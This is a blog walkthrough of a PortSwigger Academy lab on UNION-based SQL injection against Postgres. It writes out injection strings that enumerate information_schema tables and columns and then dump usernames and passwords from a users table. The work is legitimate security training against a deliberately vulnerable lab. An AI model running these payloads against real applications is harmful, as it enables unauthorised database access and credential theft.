Open in app

Sign in

Write

Sign in

Write-up: SQL injection attack, listing the database contents on non-Oracle databases @ PortSwigger Academy

Frank Leitner
3 min readJun 6, 2022

This write-up for the lab SQL injection attack, listing the database contents on non-Oracle databases is part of my walkthrough series for PortSwigger’s Web Security Academy.

Learning path: Server-side topics → SQL injection

Lab: SQL injection attack, listing the database contents on non-Oracle databases | Web Security…

Practise exploiting vulnerabilities on realistic targets. Record your progression from Apprentice to Expert. See where…

portswigger.net

Python script: script.py

Lab description

Query

The query used in the lab will look something like

SELECT * FROM someTable WHERE category = '<CATEGORY>'

Steps

The first steps are identical to the labs SQL injection UNION attack, determining the number of columns returned by the query and SQL injection UNION attack, finding a column containing text and are not repeated here.

As a result of these steps, I find out that the number of columns is 2, with both being string columns.

Find users table

The database in use here is Postgres (enumerated by injection ' UNION SELECT null,version()--), which holds the table information in the information_schema.tables-table. In the relevant documentation, the available columns are listed. We are interested in table_name. So inject ' UNION SELECT table_name, table_schema from information_schema.tables-- into the parameter to form the following query:

SELECT * FROM someTable WHERE category='X' UNION SELECT table_name, null from information_schema.tables--'`

I use an invalid category so that no articles are found and only my output appears.

Enumerate colums in this table

The information_schema.columns view holds information about the columns of each table, specifically the column_name column. The proper string to inject is ' UNION SELECT column_name, null from information_schema.columns WHERE table_name = 'users_kcstmf'-- to form this query

SELECT * FROM someTable WHERE category='X' UNION SELECT column_name, null from information_schema.columns WHERE table_name = 'users_kcstmf'--'

Enumerate all usernames and passwords

Now we have all information to obtain the required usernames and passwords. Inject ' UNION SELECT username_spivdg, password_dfxmeh from users_kcstmf-- to form this query:

SELECT * FROM someTable WHERE category='X' UNION SELECT username_spivdg, password_dfxmeh from users_kcstmf--'`

Now I simply log in to solve this exercise.

Originally published at https://github.com.

Portswigger
Portswigger Lab
Writeup
Walkthrough
Sql Injection

--

--

Frank Leitner

Written by Frank Leitner

320 Followers

Tech nerd, doing security stuff for fun and some as a job | CISSP-ISSAP, OSCP

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams